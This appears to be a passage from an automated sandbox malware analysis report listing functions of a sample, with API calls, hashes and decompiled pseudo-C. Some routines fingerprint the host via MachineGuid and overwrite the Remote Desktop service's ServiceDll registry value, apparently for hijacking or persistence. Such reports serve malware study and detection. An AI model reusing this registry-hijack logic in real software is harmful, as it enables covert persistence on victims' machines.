                                                                      • Part of subcall function 0040DD40: HeapFree.KERNEL32(00000000,00000000,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?), ref: 0040DD56
                                                                      • Part of subcall function 0040DD40: GetLastError.KERNEL32(?,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?,?), ref: 0040DD68
                                                                    • _free.LIBCMT ref: 0040CF00
                                                                    • _free.LIBCMT ref: 0040CF11
                                                                    • _free.LIBCMT ref: 0040CF22
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 8911d68373d0e4db2147d2cc41de244ca42f5d2b7dca5af37a12fb31cfb51faf
                                                                    • Instruction ID: fe4210076c81264698a3c7d0e01ded1f02e408323a3dd840fbf7e292bbb6927c
                                                                    • Opcode Fuzzy Hash: 8911d68373d0e4db2147d2cc41de244ca42f5d2b7dca5af37a12fb31cfb51faf
                                                                    • Instruction Fuzzy Hash: 7DE0BF7E8021249BC692AF5BBC054D93E21FBE670C302915BF51026672D735551DBF8D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00416193 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlDecodePointer.NTDLL(?), ref: 004161B6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: DecodePointer
                                                                    • String ID: o[A$}@
                                                                    • API String ID: 3527080286-4144133561
                                                                    • Opcode ID: e2a7858704f390135af1b0f513bc6bea2174125595e019b4c5b8425964d3883e
                                                                    • Instruction ID: c75f8cc67d4ff90171038b61d461681b8a45a2314b3b25f14b3ca80538b6e811
                                                                    • Opcode Fuzzy Hash: e2a7858704f390135af1b0f513bc6bea2174125595e019b4c5b8425964d3883e
                                                                    • Instruction Fuzzy Hash: 8551BEB090050DCBCF14EF98EA485EDBBB0FB09304F16419BD861A7254CB79D9A5DB2D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409B6A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 00409B8F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2118026453-2084237596
                                                                    • Opcode ID: 6e5149fda686c77822f5a5338aced222f84b3c1b33c0b0a996e631c3f21fafb9
                                                                    • Instruction ID: 45359b741b2cc263e06d916c17eb6927f9f232f11a2b683f45bc68c1f1c14c42
                                                                    • Opcode Fuzzy Hash: 6e5149fda686c77822f5a5338aced222f84b3c1b33c0b0a996e631c3f21fafb9
                                                                    • Instruction Fuzzy Hash: 31414A71900209AFDF16DF98CD81AEE7BB5BF48304F19406AF904772A2D339AD50DB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1FCB8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 32%
                                                                    			E02D1FCB8(intOrPtr* __ecx, void* __edx) {
				void* _v8;
				char _v12;
				char _v16;
				int _v20;
				char _v24;
				int* _t18;
				void* _t48;
				int* _t50;

				_t48 = __edx;
				_t35 = __ecx;
				_t50 = __ecx;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				 *((intOrPtr*)(__ecx)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				if( *0x2e5e094 != 0) {
					_t18 = 0x2e5e090;
				} else {
					RegOpenKeyExW(0x80000002,  *(E02D135E5( &_v12, L"SOFTWARE\\Microsoft\\Cryptography")), 0, 0x101,  &_v8);
					asm("sbb esi, esi");
					E02D15EA5(_v12);
					if(1 != 0) {
						E02D20FC3(_t48, E02D135E5( &_v12, L"MachineGuid"),  &_v24);
						E02D15EA5(_v12);
						E02D20FAE( &_v8);
					}
					E02D12E93(_t50, E02D1607A( &_v16,  &_v24));
					E02D13036( &_v16);
					_t35 = 0x2e5e090;
					_t18 = _t50;
				}
				E02D12E93(_t35, _t18);
				E02D13036( &_v24);
				E02D20FAE( &_v8);
				return _t50;
			}











                                                                    0x02d1fcb8
                                                                    0x02d1fcb8
                                                                    0x02d1fcc2
                                                                    0x02d1fcc4
                                                                    0x02d1fcc7
                                                                    0x02d1fcca
                                                                    0x02d1fccd
                                                                    0x02d1fccf
                                                                    0x02d1fcd8
                                                                    0x02d1fd61
                                                                    0x02d1fcde
                                                                    0x02d1fcfc
                                                                    0x02d1fd07
                                                                    0x02d1fd09
                                                                    0x02d1fd11
                                                                    0x02d1fd28
                                                                    0x02d1fd30
                                                                    0x02d1fd38
                                                                    0x02d1fd38
                                                                    0x02d1fd4b
                                                                    0x02d1fd53
                                                                    0x02d1fd58
                                                                    0x02d1fd5d
                                                                    0x02d1fd5d
                                                                    0x02d1fd67
                                                                    0x02d1fd6f
                                                                    0x02d1fd77
                                                                    0x02d1fd81

                                                                    APIs
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 02D1FCFC
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D20FC3: RegQueryValueExW.ADVAPI32(?,745D0770,00000000,745D0770,00000000,00000000,?,00000000,02D235AB,?,?,?,02D215B2,?,?,80000001), ref: 02D20FE6
                                                                      • Part of subcall function 02D20FC3: RegQueryValueExW.ADVAPI32(?,745D0770,00000000,745D0770,00000000,00000000,?,02D215B2,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 02D2100A
                                                                      • Part of subcall function 02D20FAE: RegCloseKey.KERNEL32(?,?,02D2112D,?,?,02D236DB), ref: 02D20FB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                    • API String ID: 1903904756-1211650757
                                                                    • Opcode ID: b9057597e5c87389e0a5f8bde0882280cf812471d42075004e06babaadded640
                                                                    • Instruction ID: cf630f7f4c5c543f6b87e32f96c40b6a583097262f86e0ac0683dbf0c2d72252
                                                                    • Opcode Fuzzy Hash: b9057597e5c87389e0a5f8bde0882280cf812471d42075004e06babaadded640
                                                                    • Instruction Fuzzy Hash: 29115170D40129BBDB14EFA4ED918EEB77AEF64701F50056AA402A3790EB705F09CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1DE1F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1DE1F(void* __edx) {
				void* _v8;
				void* _v12;
				short* _v16;
				int _v20;
				char _v24;
				void* _t28;
				void* _t46;
				int _t48;

				_t46 = __edx;
				_v8 = 0;
				E02D135E5( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v24 = 0;
				_v20 = 0;
				if(RegOpenKeyExW(0x80000002, _v16, 0, 0x20119,  &_v8) != 0) {
					L3:
					_t48 = 0;
				} else {
					_t28 = E02D20FC3(_t46, E02D135E5( &_v12, L"ServiceDll"),  &_v24);
					E02D15EA5(_v12);
					if(_t28 != 0) {
						_t48 = E02D13248(E02D12ECF( &_v24,  &_v12), 0x2e5e054);
						E02D15EA5(_v12);
						_v12 = 0;
					} else {
						E02D20FAE( &_v8);
						goto L3;
					}
				}
				E02D13036( &_v24);
				E02D15EA5(_v16);
				E02D20FAE( &_v8);
				return _t48;
			}











                                                                    0x02d1de1f
                                                                    0x02d1de31
                                                                    0x02d1de34
                                                                    0x02d1de3c
                                                                    0x02d1de49
                                                                    0x02d1de59
                                                                    0x02d1de8b
                                                                    0x02d1de8b
                                                                    0x02d1de5b
                                                                    0x02d1de70
                                                                    0x02d1de7a
                                                                    0x02d1de81
                                                                    0x02d1dec6
                                                                    0x02d1dec8
                                                                    0x02d1decd
                                                                    0x02d1de83
                                                                    0x02d1de86
                                                                    0x00000000
                                                                    0x02d1de86
                                                                    0x02d1de81
                                                                    0x02d1de90
                                                                    0x02d1de98
                                                                    0x02d1dea0
                                                                    0x02d1deaa

                                                                    APIs
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,02E5E020,?,?,02D1E451,?,?), ref: 02D1DE51
                                                                      • Part of subcall function 02D20FC3: RegQueryValueExW.ADVAPI32(?,745D0770,00000000,745D0770,00000000,00000000,?,00000000,02D235AB,?,?,?,02D215B2,?,?,80000001), ref: 02D20FE6
                                                                      • Part of subcall function 02D20FC3: RegQueryValueExW.ADVAPI32(?,745D0770,00000000,745D0770,00000000,00000000,?,02D215B2,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 02D2100A
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D20FAE: RegCloseKey.KERNEL32(?,?,02D2112D,?,?,02D236DB), ref: 02D20FB8
                                                                    Strings
                                                                    • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 02D1DE2C
                                                                    • ServiceDll, xrefs: 02D1DE5F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                                                    • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                                                    • API String ID: 1903904756-387424650
                                                                    • Opcode ID: d8f85b3c635b027089f3fad9dd4a810c41196634d9928d14c1dfd26c5477c154
                                                                    • Instruction ID: 45513815018f260fbfc4f22377b0010649c66831e6a423a3c6063dfa66564733
                                                                    • Opcode Fuzzy Hash: d8f85b3c635b027089f3fad9dd4a810c41196634d9928d14c1dfd26c5477c154
                                                                    • Instruction Fuzzy Hash: 86112E71D40218BBDB14EBA4E955CEEB77AEFA0701F5001A9984263780EB305F08CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1D9B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1D9B6(void* __ecx, void* __edx) {
				void* _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char _v28;
				char _v36;
				void* _t26;
				void* _t28;
				void* _t43;
				int _t44;
				void* _t45;

				_t43 = __edx;
				_t45 = __ecx;
				_t44 = 0;
				_v12 = 0;
				E02D135E5( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v28 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, _v20, 0, 0x102,  &_v12) == 0) {
					_t26 = E02D13221(_t45 + 0x34, _t43,  &_v36);
					_t28 = E02D21039( &_v12, E02D135E5( &_v16, L"ServiceDll"), _t26, 2);
					E02D15EA5(_v16);
					_v16 = 0;
					E02D13036( &_v36);
					E02D20FAE( &_v12);
					if(_t28 != 0) {
						_t44 = 1;
					}
				}
				E02D13036( &_v28);
				E02D15EA5(_v20);
				E02D20FAE( &_v12);
				return _t44;
			}














                                                                    0x02d1d9b6
                                                                    0x02d1d9be
                                                                    0x02d1d9c0
                                                                    0x02d1d9ca
                                                                    0x02d1d9cd
                                                                    0x02d1d9d5
                                                                    0x02d1d9e2
                                                                    0x02d1d9f2
                                                                    0x02d1d9fd
                                                                    0x02d1da14
                                                                    0x02d1da1e
                                                                    0x02d1da26
                                                                    0x02d1da29
                                                                    0x02d1da31
                                                                    0x02d1da38
                                                                    0x02d1da3a
                                                                    0x02d1da3a
                                                                    0x02d1da38
                                                                    0x02d1da3e
                                                                    0x02d1da46
                                                                    0x02d1da4e
                                                                    0x02d1da58

                                                                    APIs
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 02D1D9EA
                                                                      • Part of subcall function 02D21039: RegSetValueExW.KERNEL32(?,745D0770,00000000,?,?,?,?,?,02D21432,00000000,00000000,?,00000001,?,?,?), ref: 02D21058
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D20FAE: RegCloseKey.KERNEL32(?,?,02D2112D,?,?,02D236DB), ref: 02D20FB8
                                                                    Strings
                                                                    • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 02D1D9C2
                                                                    • ServiceDll, xrefs: 02D1DA03
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$CloseFreeOpenValueVirtuallstrcpy
                                                                    • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                                                    • API String ID: 2854241163-387424650
                                                                    • Opcode ID: d6b89ad506c9cf2d9055b815ffe70c60a8d720472b04b40e034ff0d187a44fb7
                                                                    • Instruction ID: 50f351748e7f252158007a71cddb45892a4ad9960a62b79f7b3d502a0ee7a0a4
                                                                    • Opcode Fuzzy Hash: d6b89ad506c9cf2d9055b815ffe70c60a8d720472b04b40e034ff0d187a44fb7
                                                                    • Instruction Fuzzy Hash: 45112171D04218BBDB14EFA1EC95DEEBB7AEFA4704F504469D90272780EB305E49CE60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E1A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 0040E1EB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                    • String ID: InitializeCriticalSectionEx$}@
                                                                    • API String ID: 2593887523-4085474595
                                                                    • Opcode ID: 2c3dc51cbebd3ab8ce306e6f470516fba26f4ff61fd39562ff9922b90c40d4a0
                                                                    • Instruction ID: 140e3a5272cfac2ffecfe7133136927115ec45d1775a7d4ec2ec2377cad9d731
                                                                    • Opcode Fuzzy Hash: 2c3dc51cbebd3ab8ce306e6f470516fba26f4ff61fd39562ff9922b90c40d4a0
                                                                    • Instruction Fuzzy Hash: 75F0E931A4521CB7CF016F51DC15EEE7F66DF08B54B00813EFD096A291DE354D22E689
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E045 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Alloc
                                                                    • String ID: FlsAlloc$}@
                                                                    • API String ID: 2773662609-1616921099
                                                                    • Opcode ID: 2a9e89903c9cbd0d46d5528f1686c51d81a83a499680331cd7b225bbaf66830d
                                                                    • Instruction ID: 2cce59ed5c61953386e017ba8935e43ea3336fcd5f105658b23cc269874d5e8e
                                                                    • Opcode Fuzzy Hash: 2a9e89903c9cbd0d46d5528f1686c51d81a83a499680331cd7b225bbaf66830d
                                                                    • Instruction Fuzzy Hash: 75E02030B8421877C6006B619D12AEE7A60CB14B10B00413EFD05A2281DE791D1385DE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E09B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Free
                                                                    • String ID: FlsFree$}@
                                                                    • API String ID: 3978063606-129253568
                                                                    • Opcode ID: 8df303f5c03126cfd124ba08305a6b4d50de19d40249e01cf871eef3f544e533
                                                                    • Instruction ID: 1c1fe7254dd62704444ddffa9ddea7fc5b957092a08765c2d176ce758b829968
                                                                    • Opcode Fuzzy Hash: 8df303f5c03126cfd124ba08305a6b4d50de19d40249e01cf871eef3f544e533
                                                                    • Instruction Fuzzy Hash: F6E0E531F45118B7C7046B629C12FAEBBA1CB09B00B14817EFD05A7280DEB99D1296DE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041085E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CommandLine
                                                                    • String ID: @4o
                                                                    • API String ID: 3253501508-3925662700
                                                                    • Opcode ID: 761cf7526a0e620914772b70ee89a2da9fb3c25c6c13e28083df03d00471ffdf
                                                                    • Instruction ID: aa52f304b9edc2b4dd3836b1944c731c81339586f548868786e4e785ce0a5913
                                                                    • Opcode Fuzzy Hash: 761cf7526a0e620914772b70ee89a2da9fb3c25c6c13e28083df03d00471ffdf
                                                                    • Instruction Fuzzy Hash: 10B048BC8026048B87918F69B8480883FA0B3AA20A39040E9D405C2A20DB380048AB18
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    Function 02F494E0 Relevance: 13.7, APIs: 9, Instructions: 151COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 02F49340: GetVersionExW.KERNEL32(?,00000000,?,?), ref: 02F4938B
                                                                      • Part of subcall function 02F49340: GetVersionExW.KERNEL32(?,00000000,?,?), ref: 02F493CC
                                                                      • Part of subcall function 02F49340: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 02F493EC
                                                                      • Part of subcall function 02F49340: _malloc.LIBCMT ref: 02F493F9
                                                                      • Part of subcall function 02F49340: _free.LIBCMT ref: 02F49408
                                                                    • GetVersionExW.KERNEL32(?,?,00000000,?,?), ref: 02F4953B
                                                                      • Part of subcall function 02F47760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,761B5420,02F4908D,00000000,00000000,7620F560), ref: 02F47770
                                                                      • Part of subcall function 02F47760: _malloc.LIBCMT ref: 02F4777C
                                                                      • Part of subcall function 02F47760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 02F47796
                                                                      • Part of subcall function 02F47760: _free.LIBCMT ref: 02F477A1
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,00000000,?,?), ref: 02F49572
                                                                    • _malloc.LIBCMT ref: 02F4957A
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00000000,?,?), ref: 02F4959E
                                                                    • _free.LIBCMT ref: 02F495A5
                                                                    • GetVersionExW.KERNEL32(?,?,00000000,?,?), ref: 02F495E0
                                                                    • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,?), ref: 02F4962E
                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,?), ref: 02F49663
                                                                    • _free.LIBCMT ref: 02F4966C
                                                                    Memory Dump Source
